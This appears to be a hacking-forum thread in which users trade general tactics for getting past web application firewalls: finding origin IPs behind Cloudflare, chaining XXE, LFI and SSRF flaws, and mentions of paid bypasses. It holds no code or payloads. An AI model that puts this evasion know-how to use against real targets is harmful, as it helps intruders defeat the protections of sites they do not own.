Yeah, I agree, building and debugging such combined payloads can be very complex, but in my opinion, 'complexity' isn't necessarily a bad thing, as long as it's purposeful. As I see it, complexity here is a tool for bypassing complex defense systems. I like to think of it as being like crafting a special key for a very advanced lock.

From my perspective, combining techniques is a very powerful and creative approach. Even though it increases complexity, I believe when you're up against modern defenses, it's often the only way to succeed. It's definitely worth exploring and experimenting with, in my view!
 
In general, WAFs are bypassed through various loopholes in their documented behavior. Some geniuses come up with ways to bypass the filters themselves, but as our friend with ChatGPT noted, this is often impossible. All bypasses of Cloudflare and Akamai are private and get fixed very quickly. So if we're talking about Cloudflare, look for the real IPs behind the reverse proxy; if we're talking about Akamai and Amazon, build a chain of other vulnerabilities: XXE, LFI, etc.
It doesn’t matter what type of WAF the target has; in any case, you can reach an XSS vulnerability by chaining other vulnerabilities, such as SSRF.
 
put the waf in the shitter. flush it. CF bypass can cost you $8kk
Excuse me? 8kk? Do you even know what 8kk means?.. 8 million to bypass a WAF? :D Stop using drugs, please.
 
what, you got a chip on your shoulder or just naturally a sourpuss? we’re trying to keep it technical here... so maybe dial it back and play nice, yeah?
Excuse me? 8kk? Do you even know what 8kk means?.. 8 million to bypass a WAF? :D Stop using drugs, please.
$8,000

Yes I use quality drugs

 
Excuse me? 8kk? Do you even know what 8kk means?.. 8 million to bypass a WAF? :D Stop using drugs, please.

what, you got a chip on your shoulder or just naturally a sourpuss? we’re trying to keep it technical here... so maybe dial it back and play nice, yeah?


Oh, I’m sorry—did my tone not meet the approved committee standards of pleasantness? I’ll be sure to submit my emotional range for pre-approval next time. Meanwhile, if you’re done policing vibes, maybe we can get back to the actual technical discussion you claim to care about. Don't turn me on, show me how to sneak past waf(s) experts...

 

